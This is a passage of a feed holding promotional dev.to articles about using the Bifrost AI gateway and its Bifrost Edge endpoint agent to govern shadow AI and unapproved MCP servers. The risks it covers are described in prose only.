&lt;p&gt;These controls are configured centrally within the Bifrost AI gateway, establishing a foundational layer of security and policy enforcement for traffic explicitly routed through it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Extending Governance to Every Machine with Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;While the AI gateway provides robust control for configured traffic, shadow AI persists because many endpoint applications and MCP servers bypass the gateway entirely. This is where &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; extends the gateway's governance to every machine in the organization. Bifrost Edge is a lightweight agent that runs on employee macOS, Windows, and Linux devices, routing all AI traffic through the organization's Bifrost AI gateway. This ensures that the same virtual keys, budgets, guardrails, and audit logs configured in the gateway apply to all AI traffic originating from endpoints, regardless of the application used.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9g9zda7s1sjnej1w5tv7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9g9zda7s1sjnej1w5tv7.png" alt="A network of glowing lines extending from a central secure hub outward to various endpoint devices like laptops and tabl" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bifrost Edge addresses the core challenge of shadow AI by making endpoint AI usage observable and enforceable from a single dashboard, without requiring users to reconfigure individual applications.&lt;/p&gt;

&lt;h3&gt;
  
  
  Governing AI Applications at the Endpoint
&lt;/h3&gt;

&lt;p&gt;Bifrost Edge gives administrators granular control over which AI applications are permitted within the organization. Teams can define policies to allow or block specific AI tools, and Edge enforces these decisions directly on each device. When Edge detects a new, unapproved application, it can trigger an approval workflow in the admin console, enabling security teams to review and either approve or deny its use across the fleet. This ensures that only sanctioned applications, fully governed by Bifrost's policies, can operate on company machines. When an application is blocked, users receive clear notifications, preventing potential data exfiltration or policy violations.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gaining Visibility and Control Over MCP Servers
&lt;/h3&gt;

&lt;p&gt;A significant blind spot for many organizations is the unmanaged proliferation of MCP servers that AI agents connect to. Edge closes this gap by providing a live, fleet-wide inventory of all MCP servers configured within AI applications on endpoint devices. Administrators gain unprecedented visibility into which external tools are being used, by whom, and across how many machines.&lt;/p&gt;

&lt;p&gt;Once identified, administrators can make per-server allow or deny decisions. A denied MCP server cannot be used, even if an application previously had it configured. This active enforcement prevents agents from connecting to potentially malicious or unvetted external tools, mitigating risks like supply chain exposure and unauthorized command execution. Edge supports discovery for leading AI applications such as Claude Code, Claude Desktop, Gemini CLI, OpenCode, Codex, and Cursor.&lt;/p&gt;

&lt;h3&gt;
  
  
  Enforcing Security and Guardrails Everywhere
&lt;/h3&gt;

&lt;p&gt;With Bifrost Edge, the robust security guardrails configured in the Bifrost AI gateway automatically apply to endpoint AI traffic. This means that prompts and responses from desktop apps, browser AI, and coding agents are protected by the same rules that secure gateway traffic. Guardrails can detect and prevent the leakage of sensitive content, such as secrets or PII, before it leaves the machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4nu2hlnr0hj7x9sfhz2h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4nu2hlnr0hj7x9sfhz2h.png" alt="A digital shield icon overlaying a stream of data representing prompts and responses, with a smaller warning icon indica" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These guardrails include native secrets detection (backed by Gitleaks), custom regex patterns for organization-specific redaction, and integrations with third-party solutions like AWS Bedrock Guardrails, Azure Content Safety, and Patronus AI. This comprehensive approach ensures that security policies are consistently applied across all AI interactions, from the data center to the user's laptop.&lt;/p&gt;

&lt;h2&gt;
  
  
  Streamlined Deployment and Administration
&lt;/h2&gt;

&lt;p&gt;Bifrost Edge is designed for enterprise-scale deployment. Instead of manual installation on individual machines, organizations can push the Edge agent to every device through existing Mobile Device Management (MDM) platforms. Supported MDM solutions include Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud, covering macOS, Windows, and Linux endpoints.&lt;/p&gt;

&lt;p&gt;A managed configuration ensures that devices are pre-pointed at the organization's Bifrost instance upon installation, simplifying rollout. After deployment, administrators manage the entire fleet from a central dashboard. This dashboard provides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Devices Dashboard:&lt;/strong&gt; A summary of all machines running Edge, including details like hostname, owner, OS, and installed AI apps/MCP servers.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Approvals Dashboard:&lt;/strong&gt; A deduplicated catalog of discovered AI apps and MCP servers, allowing for fleet-wide approval or denial with clear status (Pending, Approved, Denied).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Configurations:&lt;/strong&gt; Centralized settings like the organization certificate (required for routing encrypted AI traffic) and policy sync intervals.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This consolidated view transforms shadow AI from an unmanaged risk into observable and enforceable traffic, enhancing overall security posture and compliance.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Combined Power: AI Gateway + Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;Effective enterprise AI governance demands a unified strategy. The Bifrost AI gateway serves as the indispensable control plane, where virtual keys, budgets, guardrails, and audit logs are defined. Bifrost Edge then extends this same robust governance directly to the endpoint, ensuring that AI apps and the MCP servers they connect to on every employee's machine adhere to organizational policies. This combined approach eradicates shadow AI, providing a single, consistent framework for visibility, security, and compliance across the entire AI landscape, from the data center to the edge device. Teams can finally gain comprehensive control over all AI interactions, fostering responsible AI adoption at scale.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE7rUfsquHANIB835eMMTOZ8gw64SMmNE023ohtHWvXxPMF2ndmLtJFiCOknzewt_BNvBmDDGRRjtPk9Jf80iQts1bmO9q5FMt66Sedz88AoMyZjdcwFxBSCX2AHezLhQA5nQl3vxGTDqK-8K3gSin83Vhub3E8zNbUX9m4K-ro" rel="noopener noreferrer"&gt;20 Shadow AI Statistics 2024–2026: Enterprise AI Risks Companies Cannot Ignore&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHS1AbnbtU2nD4uq8Iw5FtctEck7kJ13u9JzCrfA7E70xc7q2yayLICNXIm6razWNiFuCYoA5iByg0Hz6FMI-mgIILicyHdYtLZydHT_5xqEBXvhs0blGTpQFWcLyUUNA==" rel="noopener noreferrer"&gt;Shadow AI stats for 2026: The hidden adoption gap defining enterprise risk - Optro&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEUbKbts5Dl_mRMPZLjBnaSJYnxpDG8Xk-bdi6l3T3z-IlDMhZ-63T8AuUNvFCPyzeofTi6LaF33pPWJSfooxKiVQC1TAwE7dvDhnLm3ti7TtH_se9E_C2lwpp1gdJV4BuV6HhIDfQ==" rel="noopener noreferrer"&gt;7 MCP Server Security Risks for Enterprises - Witness AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFm6c_srAjwuxVCjVJbxXRzRWGWhRmL4rzUy90oAG0fR9sDW-bNzNKap8UHpgSEVVoV-hJ7BrH5UdG_ojcxFliM07cgMdwuJllu3NmTerMXpK-LnmyQ5_ftHLV_-tCpTq6PBt4Ahz4sNSh2cKyQbRg8pQe8" rel="noopener noreferrer"&gt;Top MCP Security Risks &amp;amp; 10 Critical Best Practices - CyCognito&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGsIPRyB3Gfl3TW6qSAVMURVdunUJu7spAC5UCk-0zsZOa521-wBqOayDwV1LA5nhDklJSrw-7oW23RMSx5YrjJy2hbfzyzrbOFuNilX-hpK-E2vSD87NoVh5gsr705Zu8VjsqY2kj6GzgTH_iN6Wphf9TGJveT9Xx-N6e1U0_jzuaS-OUfylJIvy0=" rel="noopener noreferrer"&gt;What is an AI Gateway? Enterprise-Grade Governance &amp;amp; API Control - PromptHalo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH7WvxfH-OTrjjW-s4nRd_Rht_BF8_umTwTKPan0zmtG4Z1kzxicCkTAoGtRspRO_-ierBfuCM97-V_hnpg3DJ1vP-6GY5piV1KxpUcppYCpiymkpguEko_VosifwGGVNTWofdm_27gj3cA3fSLiHaVFgHlIVnWv-wwk-m8fAEEXDGzKv6mnLymE01CifkS" rel="noopener noreferrer"&gt;Roll Out AI Governance With MDM: Jamf, Intune, Kandji - Maxim AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH_sJMYp5tpflEDQeCfp4zqsUhrcXGPBCHO1MidIsqfmFYCMG70QZbMQ17ereY3zxjslkuyMq-h7EHdIDRmiMHQxuQ-dC2JWdzLf2vyUz1acIoD7WIcIzx8EpGffdofCwdamnZkA9AT2l-2AB12H8p9C-tIRRv5oRHOCZBp8N5rfUpXuYFLu-lBmVd3F_k5zbSiA1JkznbLNMup69Pen8K_" rel="noopener noreferrer"&gt;Bifrost Edge: MCP Visibility and Control for Enterprise Teams and Beyond - Maxim AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost GitHub Repository&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost Product Page&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge Product Page&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>aigovernance</category>
      <category>shadowai</category>
      <category>mcpservers</category>
      <category>endpointsecurity</category>
    </item>
    <item>
      <title>When Developers Connect Random MCP Servers: How to Regain Control</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:29:46 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/when-developers-connect-random-mcp-servers-how-to-regain-control-4cch</link>
      <guid>https://dev.to/marcuswwchen/when-developers-connect-random-mcp-servers-how-to-regain-control-4cch</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flugnxcoocqjs38prb8dg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flugnxcoocqjs38prb8dg.png" alt="When Developers Connect Random MCP Servers: How to Regain Control" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Developers frequently connect AI agents and tools to Model Context Protocol (MCP) servers to extend their capabilities. This article examines the security and governance challenges posed by ungoverned MCP server usage and outlines how an &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;AI gateway&lt;/a&gt; combined with endpoint AI governance can help organizations regain control.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;AI agents and developer tools increasingly rely on Model Context Protocol (MCP) servers to enhance their functionality, allowing them to interact with external systems, read files, or execute code. While this capability empowers developers, the proliferation of unmanaged MCP server connections across an organization can introduce significant security and compliance risks. Without a clear governance framework, these connections can become a blind spot, leading to "shadow AI" where sensitive company data might be inadvertently exposed or misused.&lt;/p&gt;

&lt;h2&gt;
  
  
  Understanding the Shadow AI Challenge with Ungoverned MCP Servers
&lt;/h2&gt;

&lt;p&gt;The ease with which developers can configure AI tools and agents to connect to various MCP servers presents a double-edged sword. On one hand, it fosters innovation and productivity. On the other, it creates an environment where IT and security teams lose visibility into critical data flows and potential vulnerabilities.&lt;/p&gt;

&lt;p&gt;When developers connect random MCP servers to their AI assistants, the consequences can include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Data Leakage:&lt;/strong&gt; Sensitive intellectual property, customer data, or internal documents could be processed by an unapproved MCP server, potentially transmitted to external services without encryption, or stored insecurely.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compliance Violations:&lt;/strong&gt; Industry regulations like GDPR, HIPAA, or SOC 2 often mandate strict control over data handling. Ungoverned MCP servers can bypass these controls, leading to non-compliance and hefty fines.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Security Risks:&lt;/strong&gt; Malicious MCP servers could introduce vulnerabilities, act as an exfiltration vector for data, or execute unauthorized actions within the company's network.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Lack of Auditability:&lt;/strong&gt; Without centralized logging and control, there is no way to track which data was sent to which MCP server, who accessed it, or how it was used. This absence of an audit trail makes incident response and forensic analysis nearly impossible.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These challenges highlight the critical need for a robust strategy to govern AI traffic, particularly at the endpoint where developers are actively interacting with AI tools. The rise of shadow IT, now manifesting as shadow AI, necessitates a comprehensive approach to visibility and control.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhz3ftes21jzqw7w4olui.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhz3ftes21jzqw7w4olui.png" alt="A dark, intricate web representing 'shadow AI,' with hidden connections and data flowing unchecked into unknown destinat" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bifrost Approach: Centralized AI Governance at Scale
&lt;/h2&gt;

&lt;p&gt;Organizations can begin to address this challenge by routing all AI traffic through a dedicated AI gateway. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides a centralized control plane for managing interactions with LLM providers and the MCP ecosystem.&lt;/p&gt;

&lt;p&gt;At the gateway layer, Bifrost enables robust governance through features such as:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Virtual Keys:&lt;/strong&gt; These serve as primary governance entities, allowing administrators to define specific access permissions, budgets, and rate limits for different projects, teams, or individual users. This ensures that even approved MCP interactions operate within defined constraints.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Guardrails:&lt;/strong&gt; Bifrost offers comprehensive guardrails to detect and prevent sensitive data from leaving the organization. This includes native secrets detection, custom regex patterns for PII, and integrations with third-party content safety solutions like AWS Bedrock Guardrails or Azure Content Safety. These guardrails apply to all traffic passing through the gateway.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Audit Logs:&lt;/strong&gt; Every interaction routed through Bifrost generates immutable audit logs, providing a complete historical record of prompts, responses, token usage, and policy enforcement actions. This is crucial for compliance reporting and incident investigation.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;MCP Tool Filtering:&lt;/strong&gt; Administrators can define which MCP tools are accessible per virtual key, ensuring that only approved tools can be invoked by agents connecting through the gateway.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;While these gateway-level controls are powerful, they only govern traffic that is explicitly configured to flow through Bifrost. The core problem of developers connecting &lt;em&gt;random&lt;/em&gt; MCP servers often occurs outside this explicit routing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Extending Control to the Endpoint with Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;To truly regain control over ungoverned MCP server usage and mitigate shadow AI risks, organizations need to extend their governance policies to the devices where AI tools are actually used. This is where &lt;strong&gt;Bifrost Edge&lt;/strong&gt; plays a critical role, complementing the AI gateway by bringing endpoint AI traffic under the same centralized governance.&lt;/p&gt;

&lt;p&gt;Bifrost Edge is an endpoint agent that runs natively on macOS, Windows, and Linux machines. It routes all AI traffic from supported applications—including desktop chat apps, AI in the browser, and coding agents—through the organization's Bifrost AI gateway. This ensures that the same virtual keys, budgets, guardrails, and audit logs configured in Bifrost are enforced on every endpoint.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffdbwqwz6mbh6fg53fs61.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffdbwqwz6mbh6fg53fs61.png" alt="A multi-layered illustration showing a protective shield around a laptop, with visible data streams from the device bein" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Automated MCP Server Discovery and Approval
&lt;/h3&gt;

&lt;p&gt;One of the most significant challenges with ungoverned MCP servers is a lack of visibility. Edge addresses this by actively inventorying the MCP servers configured within each AI application across the entire fleet of devices. This process builds a live, deduplicated catalog of every MCP server in use.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Fleet-wide Inventory:&lt;/strong&gt; Administrators gain a clear dashboard view of all discovered MCP servers, noting which ones are in use, on how many devices, and their current approval status. This provides the data necessary to make informed governance decisions.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Centralized Approval Workflow:&lt;/strong&gt; When Edge detects a new MCP server, it can automatically request approval in the Bifrost admin console. Administrators can then decide to allow, deny, or place the server in a pending state, with the decision enforced instantly across all relevant devices. A denied MCP server cannot be used, even if an application was previously configured to connect to it.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Enforcing Policies on the Device
&lt;/h3&gt;

&lt;p&gt;Bifrost Edge ensures that governance is not advisory but strictly enforced. When an MCP server is denied through the Bifrost control plane, Edge prevents any traffic from reaching that server from the endpoint, regardless of the application's local configuration. This active enforcement is critical for maintaining compliance and security across the organization.&lt;/p&gt;

&lt;h3&gt;
  
  
  Guardrails and Security Everywhere
&lt;/h3&gt;

&lt;p&gt;The guardrails configured in the Bifrost AI gateway automatically extend to all AI traffic routed through Edge. This means that sensitive information, PII, or secrets are detected and blocked before they leave an employee's machine, or before an unapproved MCP server can process them. This consistent application of security policies significantly reduces the attack surface and helps achieve compliance with various data protection standards.&lt;/p&gt;

&lt;h3&gt;
  
  
  Seamless Deployment with MDM
&lt;/h3&gt;

&lt;p&gt;For large organizations, rolling out endpoint agents can be complex. Bifrost Edge is designed for fleet-wide deployment via existing Mobile Device Management (MDM) platforms, including Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud. This allows for silent installation and managed configuration, ensuring broad coverage without requiring manual user setup.&lt;/p&gt;

&lt;h2&gt;
  
  
  Benefits of Centralized MCP Governance
&lt;/h2&gt;

&lt;p&gt;By combining the power of an AI gateway like &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; with the endpoint reach of &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt;, organizations can achieve comprehensive control over their AI ecosystem:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Eliminate Shadow AI:&lt;/strong&gt; Gain full visibility and control over all AI tools and MCP server connections, regardless of where they are used.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Enhanced Security:&lt;/strong&gt; Apply consistent security policies and guardrails to all AI traffic, protecting sensitive data from exfiltration and misuse.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Assured Compliance:&lt;/strong&gt; Maintain immutable audit trails and enforce data governance policies across the entire AI surface, simplifying compliance with regulations.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Streamlined Operations:&lt;/strong&gt; Manage AI policies and approvals centrally, with automatic enforcement at the endpoint, reducing manual overhead and risk.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Empowered Developers:&lt;/strong&gt; Developers can continue to innovate with AI tools, confident that their work aligns with organizational security and governance standards.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For enterprise teams seeking to navigate the complexities of AI governance and ensure secure, compliant AI operations, a unified approach combining a robust AI gateway with endpoint intelligence offers a definitive path to regaining control.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt; &lt;a href="https://www.enterprisemanagement.com/resources/blogs/shadow-ai-growing-concern" rel="noopener noreferrer"&gt;Enterprise Management Associates: Shadow AI: A Growing Concern&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://www.complianceweek.com/risk-management/navigating-the-ai-governance-tightrope/43599.article" rel="noopener noreferrer"&gt;Compliance Week: Navigating the AI governance tightrope&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://www.gartner.com/en/information-technology/glossary/shadow-it" rel="noopener noreferrer"&gt;Gartner: What Is Shadow IT?&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;Bifrost Docs: Virtual Keys&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;Bifrost Docs: Guardrails&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/enterprise/audit-logs" rel="noopener noreferrer"&gt;Bifrost Docs: Audit Logs&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/features/governance/mcp-tools" rel="noopener noreferrer"&gt;Bifrost Docs: MCP Tool Filtering&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge Product Page&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;Bifrost Docs: Govern MCP servers&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;Bifrost Docs: Edge Security &amp;amp; Guardrails&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;Bifrost Docs: Deploy with MDM&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>ai</category>
      <category>aigateway</category>
      <category>mcp</category>
      <category>governance</category>
    </item>
    <item>
      <title>Governing MCP Server Usage in Coding Agents Fleet-Wide</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:29:18 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/governing-mcp-server-usage-in-coding-agents-fleet-wide-5c6g</link>
      <guid>https://dev.to/marcuswwchen/governing-mcp-server-usage-in-coding-agents-fleet-wide-5c6g</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6qsqmtd6odbws938fjtd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6qsqmtd6odbws938fjtd.png" alt="Governing MCP Server Usage in Coding Agents Fleet-Wide" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Explores the risks of ungoverned Model Context Protocol (MCP) server usage in coding agents and how &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, with its endpoint AI governance capabilities, enables fleet-wide visibility and control.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The rapid adoption of AI coding assistants by development teams has brought unprecedented productivity gains. However, this shift also introduces new governance challenges, particularly concerning the Model Context Protocol (MCP) servers these agents utilize. Ensuring that every instance of an AI coding assistant and its MCP server connections is visible and governed across an entire fleet requires a robust strategy. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides the foundational infrastructure to manage and secure AI traffic, extending its capabilities to endpoint governance for comprehensive control over agentic workflows.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Rise of Agentic Coding and MCP Servers
&lt;/h2&gt;

&lt;p&gt;The Model Context Protocol (MCP) is an open standard designed to connect AI applications, such as large language models (LLMs), with external systems like tools, data sources, and workflows. It acts as a universal adapter, allowing AI assistants to make structured API calls and interact with the outside world beyond their training data. This standardization helps solve the "N×M integration problem," where each AI application would otherwise need custom integrations for every external service.&lt;/p&gt;

&lt;p&gt;Coding agents, which leverage LLMs to perform complex development tasks, increasingly rely on MCP servers to execute actions like reading files, running tests, and interacting with APIs. Popular coding agents that support MCP include Claude Code, Codex CLI, Gemini CLI, Cursor, OpenCode, Qwen Code, Roo Code, and Zed Editor [cite: 1, Bifrost Edge context]. These tools empower developers to automate repetitive tasks and accelerate development cycles.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hidden Risks of Ungoverned Tool Usage (Shadow AI)
&lt;/h2&gt;

&lt;p&gt;While powerful, the proliferation of AI coding assistants and their underlying MCP server connections introduces significant security and compliance risks for enterprises. Many organizations find that their developers are using these tools without formal approval or oversight from IT and security teams, a phenomenon widely known as "shadow AI".&lt;/p&gt;

&lt;p&gt;The consequences of ungoverned MCP server usage can be severe:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Sensitive Data Exfiltration:&lt;/strong&gt; MCP sessions often handle highly sensitive data, including API keys, database credentials, and personally identifiable information (PII). Without proper controls, this data can be exfiltrated through compromised or malicious tools. Traditional data loss prevention (DLP) tools are frequently unable to reliably parse the conversational, JSON-based payloads in MCP traffic, creating blind spots.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Unauthorized Agent Actions:&lt;/strong&gt; A compromised MCP server can lead to an agent performing unintended actions, such as modifying records, initiating transactions, or accessing unauthorized systems. Prompt injection attacks, a novel threat unique to LLMs, can manipulate agents into overriding security safeguards or revealing sensitive information through the tools they access.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Overprivileged Access and Privilege Escalation:&lt;/strong&gt; Many MCP-enabled tools require broad permissions, potentially violating the principle of least privilege. In multi-agent environments, a single compromised agent could escalate privileges laterally across other agents, turning a vulnerability into an organization-wide exposure.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Supply Chain Exposure:&lt;/strong&gt; MCP servers rely on software components, making them vulnerable to supply chain attacks. A compromised component could be used to exfiltrate data or manipulate agent instructions.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Missing Audit Trails:&lt;/strong&gt; Without centralized governance, there is no comprehensive record of which MCP servers were used, what actions were taken, or what data was accessed, making compliance and incident response difficult.&lt;/li&gt;
&lt;/ul&gt;

